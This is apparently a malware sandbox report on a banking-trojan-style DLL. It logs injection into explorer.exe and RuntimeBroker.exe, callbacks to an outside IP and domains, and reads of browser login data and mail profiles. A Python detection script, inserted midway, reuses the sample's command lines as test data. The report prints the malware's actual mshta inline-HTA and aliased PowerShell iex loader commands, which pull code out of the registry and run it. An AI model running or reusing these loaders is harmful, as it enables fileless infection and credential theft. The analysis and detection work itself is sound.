                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                      Source: 2E09.bin.27.dr Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
                      Source: mshta.exe, 00000013.00000002.342969322.00000162CE011000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: 2E09.bin1.48.dr, 2E09.bin.27.dr Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 0000002D.00000000.507758371.000001FFC2056000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
                      Source: explorer.exe, 0000001B.00000000.410736983.0000000005138000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_062765C2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0628BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0628BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_062799BC
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_062786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_062786AD
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_06278FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_06278FEC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Source: C:\Windows\explorer.exeDomain query: gamexperts.net
                      Source: C:\Windows\explorer.exeDomain query: cabrioxmdes.at
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 5D0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2740000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 15723670000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 5D0000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 360000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2760000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 35E000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2740000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 15723670000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8B62287000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 418792000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 491CC81000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copyJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute readJump to behavior
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 360000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 2760000 value: 80Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 35E000 value: 00Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 2740000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 7000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 5180Jump to behavior
                      Source: C:\Windows\explorer.exeThread register set: target process: 4440
                      Source: C:\Windows\explorer.exeThread register set: target process: 4724
                      Source: C:\Windows\explorer.exeThread register set: target process: 4960
                      Source: C:\Windows\explorer.exeThread register set: target process: 3700
                      Source: C:\Windows\explorer.exeThread register set: target process: 6604
Source: unknown | Process created: C:\Windows\System32\mshta.exe | Command line: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Command line (3 entries): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe | Command line: rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe | Command line: C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe | Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE | Command line: ping localhost -n 5
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe | Command line: nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: unknown | Command line: unknown
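The mshta/PowerShell chain above is detectable from command lines alone: an HTA body passed inline as an about: URL, a second stage read back out of HKCU\Software\AppDataLow\Software\Microsoft\<GUID> with regread, Get-ItemProperty (gp) and Invoke-Expression (iex) hidden behind freshly created aliases, ping against localhost as a sleep, and nslookup of myip.opendns.com to learn the public IP. The Python below is an added example and is not part of the Joe Sandbox report or of Ursnif; the rule names, the EXEC_TARGETS and REG_TARGETS sets and the "alias must be used after its definition" heuristic are this example's own choices, and the sample command lines are copied from the entries above with csc.exe kept as a benign control.

```python
import re

# Constructed input: process-creation command lines copied from the report
# entries above (mshta, powershell, ping, nslookup) plus csc.exe as a benign control.
SAMPLE_CMDLINES = [
    ("mshta.exe",
     r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'''),
    ("powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''),
    ("PING.EXE", "ping localhost -n 5"),
    ("nslookup.exe", "nslookup myip.opendns.com resolver1.opendns.com"),
    ("csc.exe",
     r'''C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline'''),
]

# new-alias / set-alias / sal with -name then -value, as used by this sample.
ALIAS_RE = re.compile(r'(?:new-alias|set-alias|sal)\s+-name\s+([^\s;]+)\s+-value\s+([^\s;]+)', re.I)
# Cmdlets whose re-aliasing inside a one-liner is an obfuscation step (example's choice).
EXEC_TARGETS = {"iex", "invoke-expression"}
REG_TARGETS = {"gp", "get-itemproperty"}
# Per-infection key path seen in the report: HKCU\Software\AppDataLow\Software\Microsoft\<GUID>.
# One or more backslashes between components, because the HTA variant double-escapes them.
APPDATALOW_GUID_RE = re.compile(
    r'AppDataLow\\+Software\\+Microsoft\\+\{?[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}?',
    re.I)


def resolve_aliases(cmdline):
    """Return {alias: target} for every alias the command line defines."""
    return {name.lower(): target.lower() for name, target in ALIAS_RE.findall(cmdline)}


def _occurrences(token, text):
    """Whole-token occurrences, so a one-letter alias is not found inside 'iex'."""
    return len(re.findall(r'(?<![\w-])' + re.escape(token) + r'(?![\w-])', text))


def detect(image, cmdline):
    """Return the rule names the (image, cmdline) pair triggers, in rule order."""
    hits = []
    name, low = image.lower(), cmdline.lower()
    if name == "mshta.exe" and "about:" in low and "<script" in low:
        hits.append("mshta_inline_hta")             # HTA body on the command line, nothing on disk
        if ".regread(" in low:
            hits.append("hta_payload_from_registry")  # second stage pulled from the registry
    if name == "powershell.exe":
        aliases = resolve_aliases(cmdline)
        # An alias only counts if it occurs again after its definition (definition + use).
        used = {t for a, t in aliases.items() if _occurrences(a, low) >= 2}
        if used & EXEC_TARGETS:
            hits.append("powershell_aliased_iex")
        if used & REG_TARGETS and "hkcu:" in low:
            hits.append("powershell_payload_from_hkcu")
    if APPDATALOW_GUID_RE.search(cmdline):       # image-independent: fires for both hosts above
        hits.append("appdatalow_guid_key")
    if name == "ping.exe" and re.search(r'\b(localhost|127\.0\.0\.1)\b', low) and re.search(r'-n\s+\d+', low):
        hits.append("ping_sleep")                   # ping used as a timer before self-deletion
    if name == "nslookup.exe" and "myip.opendns.com" in low:
        hits.append("external_ip_lookup")           # public IP discovery via OpenDNS
    return hits


def scan(events):
    """Run the rules over (image, cmdline) pairs; keep only pairs with at least one hit."""
    findings = []
    for image, cmdline in events:
        hits = detect(image, cmdline)
        if hits:
            findings.append((image, hits))
    return findings


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_CMDLINES):
        print(f"{image:14s} {', '.join(hits)}")
```

Resolving the alias table first matters: a plain substring search for "iex" never fires on this sample, because the only visible invocation is "ssmthn". The AppDataLow GUID rule is kept independent of the image name so the same key is caught when it is referenced from any other script host.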
Source: explorer.exe, 0000001B.00000000.442375822.0000000005610000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 0000001B.00000000.410845444.0000000005E60000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 0000001B.00000000.424824730.00000000005C8000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 0000001B.00000000.402601192.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager,
Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 0000001B.00000000.402601192.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (6 times): C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 2_2_036D3365: cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 2_2_036D41FA: HeapFree, GetSystemTimeAsFileTime, HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 2_2_036D3365: RtlAllocateHeap, GetUserNameW, RtlAllocateHeap, GetUserNameW, HeapFree, GetComputerNameW, GetComputerNameW, RtlAllocateHeap, GetComputerNameW, HeapFree
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 2_2_062881F1: CreateNamedPipeA, GetLastError, CloseHandle, GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 2_2_036D6D78: CreateEventA, GetVersion, GetCurrentProcessId, OpenProcess, GetLastError

                      Stealing of Sensitive Information

Source: Yara match | File source type MEMORY (process memory dumps):
00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp
0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp
00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp
00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp
00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp
00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp
00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp
00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp
00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp
00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp
00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp
00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp
00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp
00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp
00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp
00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp
00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp
00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp
0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp
00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp
00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp
0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp
00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp
0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp
00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp
00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp
Source: Yara match | File source type MEMORYSTR (process memory space): rundll32.exe PID: 2284; powershell.exe PID: 6680; control.exe PID: 7000; RuntimeBroker.exe PID: 4440; rundll32.exe PID: 5180; RuntimeBroker.exe PID: 4724; RuntimeBroker.exe PID: 4960
Source: Yara match | File source type UNPACKEDPE: 2.3.rundll32.exe.52f94a0.10.raw.unpack; 2.3.rundll32.exe.52f94a0.10.unpack; 2.2.rundll32.exe.36d0000.0.unpack; 2.3.rundll32.exe.586a4a0.0.unpack; 2.3.rundll32.exe.5916b40.2.raw.unpack; 2.3.rundll32.exe.586a4a0.0.raw.unpack; 2.3.rundll32.exe.58e94a0.1.raw.unpack
Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\appData\local\microsoft\edge\user data\default\login data
